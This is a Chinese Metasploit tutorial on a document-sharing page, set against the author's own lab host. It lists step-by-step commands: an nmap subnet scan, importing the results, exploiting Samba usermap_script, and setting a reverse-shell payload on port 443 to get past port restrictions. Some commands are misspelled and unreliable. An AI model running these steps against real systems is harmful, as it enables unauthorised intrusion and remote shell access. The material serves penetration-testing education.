Metasploit

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

Metasploit
1、启动Metasploit
声明:本次渗透测试的主机是我⾃⼰在⾃⼰的攻击主机上搭建的另⼀个操作系统,为了真实性设置了常见的IP地址,如有重合但绝对不是任何实体公司或者单位的IP地址。

所以不承担任何法律责任转载请注明出处
使⽤命令msfconsole 启动的时候需要启动两次,不然Postgres SQL数据库⽆法加载成功,导致 Metasploit Services⽆法启动,或者使⽤msfgui启动界⾯形式的Metasploit,但是需要提前安装,另⼀个命令是 msfcli(command line-based) ,建议使⽤的时候直接采⽤传统的⽅式启⽤,这样其配置的数据库和服务才会启动
2、使⽤namp扫描侦查的地址范围,将⽣成的报告导⼊到Metasploit中进⼀步做处理。

namp扫描的时间可能会很长。

3、扫描完之后将⽣成的数据导⼊到Metasploit中使⽤命令 db_import my.xml,
或者使⽤⼀个主机同时导⼊nmap扫描的数据 db_nmap -n -A
查询服务
查询漏洞
使⽤⼀个漏洞,查询这个漏洞需要的攻击载荷,根据攻击载荷我们提供需要的参数。

查询显⽰更多的有效载荷(因为⼀个漏洞可以运⾏多个载荷,所以可以替换不同的有效载荷)
设置要载⼊的有效载荷
⼀旦有效攻击载荷设置好之后再次查看⼀下确定设置的载荷是否成功设置
输⼊exploit 执⾏漏洞利⽤
现在把之前的测试漏洞命令总结⼀下:
第⼀步: namp 扫描IP地址范围主机 namp -n -oX my.xml 172.168.189.0/24
第⼆步:导⼊namp扫描的数据结果 db_import my.xml
第三步:查看远程主机上运⾏的服务 service
补充⼀点(这⾥可以查询单个IP的主机同时导⼊ namp的信息) db_namp -n -A 172.16.189.131
第四步:查询服务是否存在可以利⽤的漏洞信息 search samba(服务名) type:exploit platform:unix
第五步:利⽤漏洞 use exploit/mulit/samba/usermap_script
第六步:查询需要加载的配置参数和载荷 show options
第七步:查询需要漏洞的相对应的载荷 show payloads
第⼋步:设置载荷 set payload cmd/unix/reverse(载荷信息)
补充(有的攻击载荷需要⾃⼰的攻击主机的信息,需要⾃⼰添加)除此之外,我要说明⼀下这⾥被攻击的远程主机端⼝的设置;⼀般来说端⼝设置要避免远程端限制,443端⼝,443端⼝⼀般设置限制,该端⼝通常保留SSL流量,可以绕开端⼝部署的⼀些设置。

第九步:再次查看⼀下加载的有效载荷是否已经设置好 show options
第⼗步:设置RHost LHost 以极端⼝号 set RHOST 192.168.1.1 set post 443
第⼗⼀步:执⾏ exploit。

相关文档
最新文档